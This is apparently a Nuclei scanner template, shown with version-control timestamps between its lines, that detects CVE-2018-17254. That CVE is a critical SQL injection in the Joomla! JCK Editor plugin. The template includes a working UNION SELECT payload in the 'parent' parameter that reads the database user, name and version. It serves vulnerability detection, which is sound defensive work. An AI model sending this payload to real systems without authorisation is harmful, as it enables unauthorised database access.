2021-06-18 11:25:18 +00:00
id : CVE-2018-17254
2021-06-18 10:24:58 +00:00
info :
2022-02-01 20:46:07 +00:00
name : Joomla! JCK Editor SQL Injection
2021-06-18 10:24:58 +00:00
author : Suman_Kar
2021-09-10 11:26:40 +00:00
severity : critical
2022-04-22 10:38:41 +00:00
description : The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter.
2021-08-29 09:14:12 +00:00
reference :
2021-08-09 13:35:43 +00:00
- http://packetstormsecurity.com/files/161683/Joomla-JCK-Editor-6.4.4-SQL-Injection.html
- https://www.exploit-db.com/exploits/45423/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-17254
cwe-id : CWE-89
2022-04-22 10:38:41 +00:00
remediation : Update or remove the affected plugin.
2022-08-27 04:41:18 +00:00
tags : cve,cve2018,packetstorm,edb,joomla,sqli
2021-06-18 10:24:58 +00:00
requests :
- raw :
- |
GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent="%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),0x6e75636c65692d74656d706c617465),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1
Host : {{Hostname}}
Referer : {{BaseURL}}
matchers :
2021-06-18 11:25:18 +00:00
- type : word
2021-06-18 10:24:58 +00:00
part : body
2021-06-18 11:25:18 +00:00
words :
- "nuclei-template"
2022-02-01 20:46:07 +00:00
2022-02-08 16:43:22 +00:00
# Enhanced by mp on 2022/02/08